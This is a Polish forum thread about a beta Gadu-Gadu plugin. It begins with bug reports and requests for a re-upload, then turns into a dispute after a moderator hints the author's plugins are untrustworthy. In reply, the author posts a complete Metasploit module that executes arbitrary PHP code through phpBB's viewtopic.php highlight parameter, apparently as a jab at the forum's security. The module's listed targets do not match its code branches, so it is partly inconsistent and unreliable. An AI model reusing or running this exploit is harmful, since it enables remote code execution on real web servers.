NukeBoards

Nieklikowe twory - [Wtyczka] GG object

Cootje - 23-01-2013, 21:11
: Temat postu: [Wtyczka] GG object
Tytuł: GG object

Gatunek: Wtyczka
Język: C++

Autor: Cootje


Opis:
Wtyczka w wersji beta umożliwiająca obsługę sieci gg.

Obecne opcje:
Logowanie
Zmiana statusu
Ustawianie Opisu
Odbieranie wiadomości
Wysyłanie wiadomości
Odbieranie plików

Do napisania:
Automatyczne pobieranie adresu serwera
Wysyłanie plików
Lista kontaktów i jej obsługa

Polecany serwer:
IP:91.214.237.9 Port:8074

Spis serwerów
Click


Download:
Download

Uwagi:
Wszelkie bugi oraz pomysły proszę zgłaszać w temacie.
Wackyjackie - 23-01-2013, 21:34
:
Crash, przy tworzeniu zdarzenia "Connect" :U. Po wypełnieniu wszystkich pól edycji, wywaliło.

EDIT: Za drugim razem nie wywaliło ;) .
Cootje - 23-01-2013, 22:01
:
To dosyć ciekawe zjawisko bo nie widzę w tej metodzie nic co mogłoby się wywalić. ;D

W każdym razie zapomniałem dodać pewnego info o odbieraniu wiadomości!
Jeśli chcemy poprawnie je odbierać należy po odebraniu wiadomości i informacji o niej na końcu użyć akcji "Next message" inaczej będziemy odbierać w kółko tylko pierwszą wiadomość z kolejki.
Knight97 - 31-10-2013, 16:29
:
Download przenosi na:
https://sklep.premium.pl/clickportal.pl

Czy ktoś mógłby przeuploadować ten plugin?
Sporek - 31-10-2013, 23:58
:
Knight97 napisał/a:
Download przenosi na:
https://sklep.premium.pl/clickportal.pl

Czy ktoś mógłby przeuploadować ten plugin?

Chyba znajdziesz to na stronie autora. http://cootje.webd.pl/download/wtyczki/gg_ext.rar
Knight97 - 21-03-2014, 17:09
:
Niestety znowu ja ;) Miałem format peceta, a serwer na którym była wtyczka niestety nie działa - strona jest zawieszona. Posiada ktoś może plugin?
Ayth - 21-03-2014, 17:21
:
Cootje na pewno posiada ;)
Knight97 - 28-03-2014, 19:23
:
A może ktoś z forum? Napisałem nawet maila do Cootje ale nie odpisuje
wermi - 30-03-2014, 20:43
:
nie ma tej wtyczki w extensionview?
Knight97 - 31-03-2014, 19:36
:
Niestety nie ma tej wtyczki tam, a w sieci też nie ma linków ;(
Minty - 01-04-2014, 14:00
:
Szczerze mówiąc używanie akurat tej wtyczki od akurat tego autora może nie być dobrym pomysłem.
Cootje - 23-02-2015, 13:50
:
Knight97, nigdy nie dostałem żadnego emaila od Ciebie.

Pff... moje wtyczki zawsze były czyste jak masz jakieś ale to badaj sobie nawet IDĄ czy ollym, ale chyba wystarczy sprawdzać WIRESHARKIEM jakie pakiety i gdzie lecą. ;> Więc zanim coś powiesz to pierw miej podstawę lub dowód.

Link:
https://www.dropbox.com/s...o/gg10.rar?dl=0

To jak dbacie o zabezpieczenia forum to już wasza sprawa...
Minty - 23-02-2015, 14:10
:
Bezczelne nadużywanie funkcjonalności nie ma nic wspólnego z zabezpieczeniami.
Cootje - 23-02-2015, 14:30
:

Kod:
require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient

def initialize(info = {})
super(update_info(info,
'Name' => 'phpBB viewtopic.php Arbitrary Code Execution',
'Description' => %q{
This module exploits two arbitrary PHP code execution flaws in the
phpBB by przemo forum system.
},
'Author' => [ 'valsmith[at]metasploit.com', 'hdm', 'patrick' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 9671 $',
'References' =>
[
[ 'CVE', '2005-2086'],
[ 'CVE', '2004-1315'],
[ 'OSVDB', '11719'],
[ 'OSVDB', '17613'],
[ 'BID', '14086'],
[ 'BID', '10701'],
],
'Privileged' => false,
'Payload' =>
{
'DisableNops' => true,
'Space' => 1024,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl ruby bash telnet',
}
},
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Targets' =>
[
[ 'Automatic', { }],
[ 'phpbb <=1.12.7', { }],
[ 'phpbb <=1.12.8', { }],
],
'DisclosureDate' => 'Nov 12 2004',
'DefaultTarget' => 0))

register_options(
[
OptString.new('URI', [true, "The phpBB root Directory", "/phpBB2"]),
OptString.new('TOPIC', [false, "The ID of a valid topic"]),
], self.class)
end

def find_topic

1.upto(32) do |x|

res = send_request_raw({
'uri' => datastore['URI'] + '/viewtopic.php?topic=' + x.to_s,
}, 25)

if (res and res.body.match(/class="postdetails"/))
print_status("Discovered valid topic ID: #{x}")
return x
end

end
return false

end

def exploit

topic = datastore['TOPIC'] || find_topic

if !(topic)
print_status("No valid topic ID found, please specify the TOPIC option.")
return
else

sploit = datastore['URI'] + "/viewtopic.php?t=#{topic}&highlight="

case target.name
when /Automatic/
req = "/viewtopic.php?t=#{topic}&highlight=%2527%252ephpinfo()%252e%2527"

res = send_request_raw({
'uri' => datastore['URI'] + req
}, 25)

print_status("Trying to determine which attack method to use...")

if (res and res.body =~ /\<title>phpinfo/)
byte = payload.encoded.unpack('C*').map! { |ch| ch = "chr(#{ch})" }.join('%252e')
sploit << "%2527%252epassthru(#{byte})%252e%2527"
else
byte = payload.encoded.unpack('C*').map! { |ch| ch = "chr(#{ch})" }.join('.')
sploit << "%27.passthru(#{byte}).%27"
end

when /2\.0\.10/
byte = payload.encoded.unpack('C*').map! { |ch| ch = "chr(#{ch})" }.join('%252e')
sploit << "%2527%252epassthru(#{byte})%252e%2527"
when /2\.0\.15/
byte = payload.encoded.unpack('C*').map! { |ch| ch = "chr(#{ch})" }.join('.')
sploit << "%27.passthru(#{byte}).%27"
end

res = send_request_raw({
'uri' => sploit
}, 25)

end

end

end